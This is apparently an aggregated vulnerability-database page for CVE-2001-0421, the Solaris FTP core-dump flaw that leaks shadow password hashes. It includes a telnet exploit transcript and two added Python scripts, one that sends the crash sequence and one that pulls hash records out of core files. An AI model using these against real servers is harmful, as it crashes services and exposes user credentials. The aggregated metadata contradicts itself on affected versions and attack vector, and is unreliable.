CVE-2001-0421
CVSS 6.4
Published: 2001-07-02 00:00:00
Revised: 2008-09-05 16:24:04

[Original] FTP server in Solaris 8 and earlier allows local and remote attackers to cause a core dump in the root directory, possibly with world-readable permissions, by providing a valid username with an invalid password followed by a CWD ~ command, which could release sensitive information such as shadowed passwords, or fill the disk partition.


[CNNVD] Solaris FTP core dump leaks user password hashes (CNNVD-200107-004)

        
        Solaris is Sun's well-known and widely deployed UNIX operating system.
        The FTP server shipped with Solaris 2.6 has a flaw that can expose the contents of the shadow file, which holds the password hashes of system users and is by default readable only by root.
        When Solaris in.ftpd receives a 'CWD ~' request before the user has logged in, it copies the user's home directory into a buffer. Before login, however, the home pointer is NULL, so the copy causes a segmentation fault and ftpd leaves a core file in the system root directory. That core file can contain part of the shadow file. On Solaris 2.6 the core file is world-readable by default, so an unprivileged user can recover some or all of the password hashes. On Solaris 7/8 the default core file is not readable by others, so no security problem arises there.
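The exchange described above, written as a probe for the crash. This is an added example, not code from CNNVD, Sun or the Bugtraq poster: it sends the same three commands as the transcript on this page (a valid USER, a wrong PASS, then CWD ~) followed by a NOOP, and treats a daemon that stops answering after the CWD as vulnerable. The host, port and username are caller-supplied; `start_fake_ftpd` is a constructed in-process stand-in for a vulnerable and a fixed in.ftpd so the probe can be exercised offline, not a model of the real daemon's internals.

```python
import socket
import threading


def _readline(sock):
    """Read one CRLF-terminated FTP control line; b'' means the peer is gone.

    Assumption: single-line replies (enough for 220/331/530/200). A real
    daemon may send multi-line banners, which this helper does not handle.
    """
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(1)
        if not chunk:
            return buf
        buf += chunk
    return buf


def probe(host, port, user, bad_password="wrongpass", timeout=5.0):
    """Send USER <valid>, PASS <wrong>, CWD ~, then NOOP.

    Returns "vulnerable" if the daemon stops answering after the CWD (the
    crash-and-core behaviour from the advisory), "not_vulnerable" if the
    control connection stays up, "no_signal" if the trigger was never reached
    or the follow-up timed out.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        if not _readline(s).startswith(b"220"):
            return "no_signal"
        for cmd in (b"USER " + user.encode(), b"PASS " + bad_password.encode()):
            s.sendall(cmd + b"\r\n")
            if not _readline(s):
                return "no_signal"
        s.sendall(b"CWD ~\r\n")
        try:
            cwd_reply = _readline(s)      # transcript shows a 530 here
            s.sendall(b"NOOP\r\n")        # a live daemon answers this
            follow_up = _readline(s)
        except socket.timeout:
            return "no_signal"
        except OSError:                   # ECONNRESET / EPIPE: daemon died
            return "vulnerable"
        if not cwd_reply or not follow_up:
            return "vulnerable"
        return "not_vulnerable"


def start_fake_ftpd(vulnerable):
    """Constructed stand-in for in.ftpd serving one connection on 127.0.0.1.

    Replies mimic the SunOS 5.6 transcript. With vulnerable=True the CWD
    handler closes the connection after its 530, which is what a client sees
    when the real daemon segfaults and dumps core. Returns the bound port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.sendall(b"220 sun26 FTP server (SunOS 5.6) ready.\r\n")
            while True:
                line = _readline(conn)
                if not line:
                    return
                verb = line.split(b" ", 1)[0].strip().upper()
                if verb == b"USER":
                    conn.sendall(b"331 Password required.\r\n")
                elif verb == b"PASS":
                    conn.sendall(b"530 Login incorrect.\r\n")
                elif verb == b"QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    return
                else:
                    conn.sendall(b"530 Please login with USER and PASS.\r\n")
                    if verb == b"CWD" and vulnerable:
                        return  # the "crash": socket closed, no more replies

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1], int(sys.argv[2]), sys.argv[3]))
```

A positive result on a real host only shows that the daemon stopped responding; whether that left a world-readable /core with shadow fragments depends on the core-file settings the description covers, so follow up by checking the root directory on the server.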
        

- CVSS (base score)

CVSS score: 6.4 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no special access conditions are required to exploit]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0421
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0421
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-004
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/2601
(VENDOR_ADVISORY)  BID  2601
http://www.securityfocus.com/archive/1/177200
(UNKNOWN)  BUGTRAQ  20010417 Re: SUN SOLARIS 5.6/5.7 FTP Globbing Exploit !

- Vulnerability information

Solaris FTP core dump leaks user password hashes
Medium  Configuration error
2001-07-02 00:00:00 2005-10-20 00:00:00
Local
        
        Solaris is Sun's well-known and widely deployed UNIX operating system.
        The FTP server shipped with Solaris 2.6 has a flaw that can expose the contents of the shadow file, which holds the password hashes of system users and is by default readable only by root.
        When Solaris in.ftpd receives a 'CWD ~' request before the user has logged in, it copies the user's home directory into a buffer. Before login, however, the home pointer is NULL, so the copy causes a segmentation fault and ftpd leaves a core file in the system root directory. That core file can contain part of the shadow file. On Solaris 2.6 the core file is world-readable by default, so an unprivileged user can recover some or all of the password hashes. On Solaris 7/8 the default core file is not readable by others, so no security problem arises there.
        

- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
        * Disable core dumps, or set the umask so that core files are not readable by others
        Vendor patch:
        Sun
        ---
        The vendor has released a patch for this issue; download it from the vendor's site:
        
        http://sunsolve.sun.com/security

- Vulnerability information (20764)

Solaris 2.6 FTP Core Dump Shadow Password Recovery Vulnerability (EDBID:20764)
solaris remote
2001-04-17 Verified
warning3
source: http://www.securityfocus.com/bid/2601/info

Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.

A problem in the ftp server included with the Solaris Operating System could allow a local user to recover parts of the shadow file, containing encrypted passwords. Due to a previously known problem involving a buffer overflow in glob(), it is possible to cause a buffer overflow in the Solaris ftp server, which will dump parts of the shadow file to core. This can be done with the CWD ~ command, using a non-standard ftp client.

Therefore, a local user could cause a buffer overflow in the ftp server, and upon reading the core file, recover passwords for other local users, potentially gaining elevated privileges.

[root@ /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3. <-- a valid username
pass blahblah <--- a wrong password
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]> ls -l /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
[root@ /usr/sbin]> strings /core|more
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::
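A scripted version of the `ls -l /core` and `strings /core` steps in the transcript above, which also covers the check behind the workaround in the advisories section (is the core readable by other users, and does it carry shadow records). This is an added example, not code from the advisory or the Bugtraq poster. It assumes the Solaris shadow(4) nine-field record layout, treats `NP` and `*`-prefixed password fields as locked accounts, and `SAMPLE_CORE` is a constructed byte string shaped like the transcript's fragments, not a real dump.

```python
import os
import re
import stat

# shadow(4) record: name:password:lastchg:min:max:warn:inactive:expire:flag
# (nine colon-separated fields). The transcript's "lp:NP:6445::::::" is one.
SHADOW_RECORD = re.compile(
    rb"([a-z_][a-z0-9_-]*):([^:\s]*):(\d*):(\d*):(\d*):(\d*):(\d*):(\d*):(\d*)"
)

# Constructed sample, not a real Solaris core: ELF-looking junk around two
# complete records and the torn "uucp" fragment seen in the transcript.
SAMPLE_CORE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 16
    + b"root:k8gNuF7hQ2xYs:11234::::::\x00"   # made-up 13-char crypt(3) string
    + b"\x02\x00\x00\x00"
    + b"lp:NP:6445::::::\x00"                  # locked system account
    + b"\xff\xfe"
    + b"uucp:NP:6445:::"                       # truncated: only five colons
)


def printable_runs(blob, minlen=4):
    """strings(1)-style: runs of at least minlen printable ASCII bytes."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % minlen, blob)


def secret_kind(field):
    """Classify the password field the way Solaris uses it."""
    if field == b"":
        return "empty"          # no password set
    if field == b"NP" or field.startswith(b"*"):
        return "locked"         # NP / *LK*: no password login possible
    return "hash"               # crypt(3) output, crackable offline


def shadow_records(blob):
    """Return [{'user', 'secret'}] for every complete record found in blob."""
    found = []
    for run in printable_runs(blob):
        for m in SHADOW_RECORD.finditer(run):
            found.append({"user": m.group(1).decode(),
                          "secret": secret_kind(m.group(2))})
    return found


def inspect_core(path):
    """Report whether the core is readable by 'other' and which hashes leak."""
    mode = os.stat(path).st_mode
    with open(path, "rb") as f:
        records = shadow_records(f.read())
    return {
        "world_readable": bool(mode & stat.S_IROTH),
        "records": records,
        "leaked_hashes": [r["user"] for r in records if r["secret"] == "hash"],
    }


def write_sample_core(path, mode=0o644):
    """Write SAMPLE_CORE with the -rw-r--r-- mode the transcript's ls -l showed."""
    with open(path, "wb") as f:
        f.write(SAMPLE_CORE)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    import sys
    import tempfile
    target = sys.argv[1] if len(sys.argv) > 1 else write_sample_core(
        os.path.join(tempfile.mkdtemp(), "core"))
    print(inspect_core(target))
```

Run it with the path to the core on the server, or with no argument to exercise it on the constructed sample. The umask advice in the workaround targets exactly the `world_readable` flag: with other-read cleared the hashes are still in the file but an unprivileged user can no longer read them, whereas disabling core dumps for the daemon removes the file altogether.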

- Vulnerability information

8684
Solaris FTP Forced Core Dump Information Disclosure
Local Access Required Information Disclosure
Loss of Confidentiality Patch / RCS
Exploit Public Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2001-04-17 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Solaris FTP Core Dump Shadow Password Recovery Vulnerability
Configuration Error 2601
Remote: No  Local: Yes
2001-04-17 12:00:00 2009-07-11 06:06:00
This vulnerability was announced to Bugtraq by Warning3 <warning3@mail.com> on April 17, 2001.

- Affected program versions

Sun Solaris 2.6
Sun Solaris 8_sparc
Sun Solaris 7.0

- Unaffected program versions

Sun Solaris 8_sparc
Sun Solaris 7.0

- Vulnerability discussion

Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.

A problem in the ftp server included with the Solaris Operating System could allow a local user to recover parts of the shadow file, containing encrypted passwords. Due to a previously known problem involving a buffer overflow in glob(), it is possible to cause a buffer overflow in the Solaris ftp server, which will dump parts of the shadow file to core. This can be done with the CWD ~ command, using a non-standard ftp client.

Therefore, a local user could cause a buffer overflow in the ftp server, and upon reading the core file, recover passwords for other local users, potentially gaining elevated privileges.

- Exploit

[root@ /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3. <-- a valid username
pass blahblah <--- a wrong password
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]> ls -l /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
[root@ /usr/sbin]> strings /core|more
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.
